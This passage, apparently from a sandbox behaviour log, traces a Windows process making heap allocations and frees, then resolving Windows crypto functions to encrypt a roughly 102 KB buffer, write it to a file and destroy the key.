Flags=0x0, Size=0x8) returned 0x43e28f0 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0122.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0122.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0122.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0122.520] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0122.520] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e27c0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27c0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0122.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.522] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.522] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.522] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0122.523] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.523] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.525] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x18e62, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x18e70) returned 1 [0122.525] CharLowerBuffW (in: lpsz="byte[102001]", cchLength=0xc | out: lpsz="byte[102001]") returned 0xc [0122.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.527] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451ee78*, pdwDataLen=0x144e790*=0x18e62, dwBufLen=0x18e70 | out: pbData=0x451ee78*, pdwDataLen=0x144e790*=0x18e70) returned 1 [0122.527] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.545] WriteFile (in: hFile=0x258, lpBuffer=0x49c2e88*, nNumberOfBytesToWrite=0x18e70, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49c2e88*, lpNumberOfBytesWritten=0x144f194*=0x18e70, lpOverlapped=0x0) returned 1 [0122.548] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.548] CryptDestroyKey (hKey=0x41ac640) returned 1 [0122.548] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.548] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 